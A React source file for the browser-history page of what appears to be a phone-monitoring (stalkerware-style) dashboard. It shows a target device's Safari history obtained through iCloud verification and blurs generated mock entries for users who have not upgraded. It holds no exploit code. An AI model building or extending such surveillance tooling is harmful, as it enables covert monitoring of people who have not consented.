import { useState, useEffect, useRef, useCallback } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'


import { useTranslation } from 'src/utils/i18n'

import Grid from '@mui/material/Grid'
import Icon from 'src/@core/components/icon'
import styles from '../../../styles/browser-history.module.scss'
import TextField from '@mui/material/TextField'
import InputAdornment from '@mui/material/InputAdornment'
import Card from '@mui/material/Card'
import Image from 'next/image'
import Link from 'next/link'
import dayjs from 'dayjs'

// request
import { getSafariHistory } from 'src/@api/dashboard'

import { useDispatch, useSelector } from 'react-redux'
import { setCurrentTab } from 'src/store/apps/Common'
import { DatePicker } from 'antd'
import NoData from 'src/components/NoData'
import RangePickerBox from 'src/components/RangePickerBox'
import { generateMockData } from 'src/utils'
import { changeExtremeService } from 'src/store/apps/Common'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'
import { getUserAccountOrder } from 'src/@api/login'
import { buildTimeParams, toMillis } from 'src/utils/dateRangeParams'

const { RangePicker } = DatePicker

// 将日期按天分开
const dataResort = data => {
  // 定义空数组，用于存储新组装的数据
  let newArr = []

  let add = 978278400

  // 遍历数组
  data.forEach((item, i) => {
    // 默认当前操作的数据下标 -1
    let index = -1

    // 判断数组中是否已经存在当前遍历数据的时间
    let isExists = newArr.some((newItem, j) => {
      if (dayjs.unix(item.visitTime + add).format('YYYY-MM-DD') == newItem.visitTime) {
        // 存在就保存当前数据下标  用于插入数据
        index = j

        return true
      }
    })

    // 如果没有就存储一条新对象数据
    if (!isExists) {
      newArr.push({
        visitTime: dayjs.unix(item.visitTime + add).format('YYYY-MM-DD'),
        subList: [item]
      })
    } else {
      // 如果有就插入到已存在的对象中
      newArr[index].subList.push(item)
    }
  })

  // 返回新数组
  return newArr
}

const BrowserHistory = () => {
  const store = useSelector(state => state.Common)
  const { t, locale } = useTranslation('common')

  let Basic = window.localStorage.getItem('Basic')
  Basic = Basic == null || Basic == 0 ? true : false

  const [initHistoryData, setInitHistoryData] = useState([])

  const [historyData, setHistoryData] = useState([])

  const [selectData, setSelectData] = useState({
    id: 1,
    category: 'SAFARI_HISTORY',
    name: 'Safari',
    icon: '/images/history/chrome.png',
    contents: []
  })

  //筛选过的消息列表
  const [selectDataList, setSelectDataList] = useState([])

  const [active, setActive] = useState(0)

  // 分页参数
  const [pagination, setPagination] = useState({
    reqNum: 50, // 单次查询数量
    nowOffset: 0, // 偏移量
    maxNum: false // 全部数据查询完毕
  })

  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const [fetchLoading, setFetchLoading] = useState(true) // 数据获取中
  const basicNotOver = [null, ''].includes(store.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(store.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  // 拼接新数据
  const appendValue = (old, arr, nowDate) => {
    let newContents = []
    old.contents.map(item => {
      const nowData = arr[0].contents.find(item2 => item.date === item2.date)
      if (nowData !== undefined) newContents.push({ date: item.date, items: [...item.items, ...nowData.items] })
      else newContents.push(item)
    })

    nowDate.forEach(item => {
      if (newContents.findIndex(item2 => item2.date === item) === -1) {
        const newData = arr[0].contents.find(item2 => item2.date === item)
        newContents.push({ date: item, items: newData.items })
      }
    })

    return { ...old, contents: newContents }
  }

  const setData = async (nowOffset, range = antdSelectedDates) => {
    let arr = [
      {
        id: 2,
        category: 'CHROME_HISTORY',
        name: 'Safari',
        icon: '/images/history/safari.png',
        contents: []
      }
    ]

    const username = JSON.parse(localStorage.getItem('DeviceUser')) != null
      ? JSON.parse(localStorage.getItem('DeviceUser')).username
      : ''

    // 获取最近的10笔订单
    let res = await getUserAccountOrder({ page: 1, pageSize: 10 })

    // 查找有限期最长的订单
    const lastOrder = res.data.sort((a, b) => dayjs(b.expire_time).valueOf() - dayjs(a.expire_time).valueOf())[0]

    // 计算是否为增值服务上线前付费用户

    // 增值服务上线前付费用户状态更新

    let response = await getSafariHistory({
      username,
      params: {
        category: 'SAFARI_HISTORY',
        offset: nowOffset,
        limit: pagination.reqNum,
        // 日期筛选走接口：带 startTime/endTime 时服务端按时间过滤
        ...buildTimeParams(range),
        deviceUdid:
          JSON.parse(localStorage.getItem('currentDevice')) != null
            ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
            : ''
      }
    })

    const advanced = username == null || !('advanced' in response) || ['true', true].includes(response?.advanced) // 高级服务开通状态
    setAdvanced(advanced)
    dispatch(changeExtremeService(advanced)) // 更新高级服务状态

    if (response.data.contents == null) {
      if (historyData.length <= 0) setHistoryData(arr)
      setPagination(page => ({ ...page, maxNum: true }))
      setFetchLoading(false)

      return
    }

    // 按日期分组
    const groupedContents = response.data.contents.reduce((acc, item) => {
      const dateKey = dayjs(item.visitTime).format('YYYY/MM/DD') // 父级的日期格式
      if (!acc[dateKey]) {
        acc[dateKey] = [] // 如果没有这个日期的分组，先创建一个空数组
      }
      acc[dateKey].push({
        ...item,
        time: dayjs.unix(item.visitTime).format('HH:mm') // 子项的时间格式
      })

      return acc
    }, {})

    let nowDate = []

    // 将分组后的内容转换为数组形式，并加上父级包裹
    arr[0].contents = Object.keys(groupedContents).map(dateKey => {
      nowDate.push(dateKey)

      return {
        date: dateKey, // 父级的日期
        items: groupedContents[dateKey] // 对应日期下的内容
      }
    })

    if (advanced && initHistoryData.length > 0) {
      setSelectData(old => appendValue(old, arr, nowDate))
      setSelectDataList(old => appendValue(old, arr, nowDate))
      setInitHistoryData(old => [appendValue(old[0], arr, nowDate)])

      setHistoryData(old => [appendValue(old[0], arr, nowDate)])
    } else {
      arr[0].contents = generateMockData(arr[0].contents, 3)

      setSelectData(arr[0])
      setSelectDataList(arr[0])
      setInitHistoryData(arr)
      setHistoryData(arr)
    }

    setFetchLoading(false)
  }

  useEffect(() => {
    const nowOffset = 0
    setData(nowOffset)
  }, [])

  const dom = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      setHistoryData([])
      setInitHistoryData([])
      setSelectData({})
      setSelectDataList([])
      setPagination({ reqNum: 50, nowOffset: 0, maxNum: false })
      setScroll(0)
      setFetchLoading(true)
      setData(0)
    }, [])
  )

  // 获取滚动百分比
  useEffect(() => {
    const handScroll = () => {
      if (dom.current) {
        const { scrollTop, scrollHeight, clientHeight } = dom.current
        const progress = (scrollTop / (scrollHeight - clientHeight)) * 100

        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = dom.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handScroll)
      }
    }
  }, [])

  // 监听滚动百分比
  useEffect(() => {
    if (scroll >= 100 && advanced) {
      const nowOffset = pagination.nowOffset + pagination.reqNum
      setPagination(page => ({ ...page, nowOffset }))

      if (!pagination.maxNum) setData(nowOffset)
    }
  }, [scroll])

  const [selectedDates, setSelectedDates] = useState(null)
  const [antdSelectedDates, setAntdSelectedDates] = useState([])
  const [selectedDateIndex, setSelectedDateIndex] = useState()

  const { RangePicker } = DatePicker

  //选择日期范围
  const handleDateChange = (dates, dateStrings) => {
    const picked = dates && dates.length === 2 ? dates : []

    setAntdSelectedDates(picked)
    setSelectedDateIndex(picked.length === 2 ? 2 : undefined)

    if (!advanced) {
      // 未开通高级：列表是本地模拟数据，直接本地筛
      if (!selectDataList || !selectDataList.contents) return

      const { startTime, endTime } = buildTimeParams(picked)
      const newDateList =
        picked.length === 2
          ? selectDataList.contents.filter(item => {
              const itemTime = toMillis(item.date)

              return itemTime >= startTime && itemTime <= endTime
            })
          : [...selectDataList.contents]

      setSelectData(prevData => ({
        ...prevData,
        contents: newDateList
      }))

      return
    }

    // 已开通高级：重置分页后带 startTime/endTime 重新请求接口
    setHistoryData([])
    setInitHistoryData([])
    setSelectData({})
    setSelectDataList([])
    setPagination({ reqNum: 50, nowOffset: 0, maxNum: false })
    setScroll(0)
    setFetchLoading(true)
    setData(0, picked)
  }

  // 处理当前选中数据
  const handleSelectClick = id => {
    setActive(id)

    let data = historyData.find((item, index) => {
      return index === id
    })

    setSelectData(data)
  }

  const dispatch = useDispatch()

  useEffect(() => {
    const title = t('Browser history')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  return (
    <>
      <Card>
        <div className='flex flex-col md:flex-row w-full Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] relative'>
          {
            !fetchLoading && !gatePending &&
            <>
              {
                (!basicNotOver && !advancedNotOver && !justVerified) ?
                  <>
                    {/* 高级服务开通提示 */}
                    {showUpgradeModal && <ExtremeUpgradeModal open />}
                  </>
                  :
                  <>
                    {/* 增值服务 iCloud验证流程 */}
                  </>
              }

            </>
          }

          {/* left layout */}
          <div className={`md:w-[300px] w-full ${!advanced ? 'blur-[16px] select-none' : ''}`}>
            {/* 时间选择器 */}
            <div className='w-full mt-[15px] flex flex-col justify-center px-[15px] border-b-[1px] border-[#E5E7EB]'>
              <div className='w-full flex justify-start'>
                {historyData && (
                  <RangePickerBox
                    value={antdSelectedDates}
                    onChange={handleDateChange}
                    onClear={() => {
                      setAntdSelectedDates([])
                      handleDateChange([])
                    }}
                    disabled={!advanced}
                  />
                )}
              </div>
              <div className='flex justify-center items-center w-full h-[48px] my-[15px]'>
                <div className='flex justify-center w-full h-full'>
                  {historyData.map((row, index) => (
                    <li
                      className={`flex items-center rounded-[6px] px-[20px] w-full hover:cursor-pointer ${active === index ? `bg-[#E5E5E5]` : `bg-[#fff]`
                        }`}
                      key={index}

                    // onClick={() => handleSelectClick(index)}
                    >
                      <div className=''>
                        <Image src={row.icon} width={30} height={30} alt='' />
                      </div>
                      <div className='ml-[8px]'>
                        <span className='text-[#334062] text-[14px]'>{row.name}</span>
                      </div>
                    </li>
                  ))}
                </div>
              </div>
            </div>
          </div>
          {/* right layout */}
          <div className={`flex flex-col flex-1 h-full overflow-hidden md:border-l-[1px] md:border-l-[#E5E7EB] ${!advanced ? 'blur-[16px] select-none' : ''}`}>
            <ul ref={dom} className={`px-[15px] border-[#E5E7EB] pt-4 ${advanced ? 'overflow-y-auto' : 'overflow-hidden'}`}>
              {selectData.contents !== null && selectData?.contents?.length > 0 ? (
                selectData.contents.map((row, index) => (
                  <li className={`${!advanced ? 'blur-[16px] select-none border-b-[1px]' : ''} flex flex-col w-full pb-[18px] mb-[18px]`} key={row.id}>
                    <h2 className='text-[16px] text-[#80889D] font-[600] leading-[24px] mb-[18px]'>{row.date}</h2>
                    <div className='flex flex-col gap-y-[23px] h-full'>
                      {row.items.map((item, i) => (
                        <div key={i} className={`${!advanced && ((index === 0 && i !== 0) || index !== 0) ? 'blur-[16px] select-none' : ''} flex w-full`}>
                          {/* 左侧内容 */}
                          <div className='flex w-[70px] flex-shrink-0 justify-between items-center'>
                            <div className='text-[#646464] text-[14px]'>{item.time}</div>
                            <Image src={selectData.icon} width={18} height={18} alt='img' />
                          </div>

                          {/* 右侧内容 */}
                          <div
                            className='ml-2 flex-1'
                            style={{
                              textOverflow: 'ellipsis',
                              overflow: 'hidden',
                              whiteSpace: 'nowrap',
                              width: '100%' // 确保文本宽度跟随父元素
                            }}
                          >
                            {/* <div>{item.title}</div> */}
                            {
                              advanced ? <Link target='_blank' className='text-[#646464] text-[14px]' href={item.url}>
                                {item.url}
                              </Link>
                                :
                                <p className='text-[#646464] text-[14px]'>{item.url}</p>
                            }
                          </div>
                        </div>
                      ))}
                    </div>
                  </li>
                ))
              ) : (
                <>{(!selectDataList.contents || selectDataList.contents.length === 0) && <NoData />}</>
              )}
            </ul>
          </div>
        </div>
      </Card>
    </>
  )
}

export default BrowserHistory

// useEffect(() => {
//   let setData = async data => {
//     let arr = [
//       {
//         id: 1,
//         category: 'SAFARI_HISTORY',
//         name: 'Safari',
//         icon: '/images/history/safari.png',
//         contents: []
//       },
//       {
//         id: 2,
//         category: 'CHROME_HISTORY',
//         name: 'Chrome',
//         icon: '/images/history/chrome.png',
//         contents: []
//       }
//     ]

//     let response = await getSafariHistory(data)
//     if (response.data.contents == null) {
//       return
//     }

//     // 按日期分组
//     const groupedContents = response.data.contents.reduce((acc, item) => {
//       const dateKey = dayjs(item.time).format('YYYY/MM/DD') // 父级的日期格式
//       if (!acc[dateKey]) {
//         acc[dateKey] = [] // 如果没有这个日期的分组，先创建一个空数组
//       }
//       acc[dateKey].push({
//         ...item,
//         time: dayjs.unix(item.time).format('HH:mm') // 子项的时间格式
//       })

//       return acc
//     }, {})

//     // 将分组后的内容转换为数组形式，并加上父级包裹
//     arr[0].contents = Object.keys(groupedContents).map(dateKey => {
//       return {
//         date: dateKey, // 父级的日期
//         items: groupedContents[dateKey] // 对应日期下的内容
//       }
//     })
//     setSelectData(arr[0])
//     setSelectDataList(arr[0])
//     setInitHistoryData(arr)
//     setHistoryData(arr)
//   }
//   setData({
//     username:
//       JSON.parse(localStorage.getItem('DeviceUser')) != null
//         ? JSON.parse(localStorage.getItem('DeviceUser')).username
//         : '',
//     params: {
//       category: 'SAFARI_HISTORY',
//       offset: 0,
//       limit: 1000,
//       deviceUdid:
//         JSON.parse(localStorage.getItem('currentDevice')) != null
//           ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
//           : ''
//     }
//   })
// }, [])
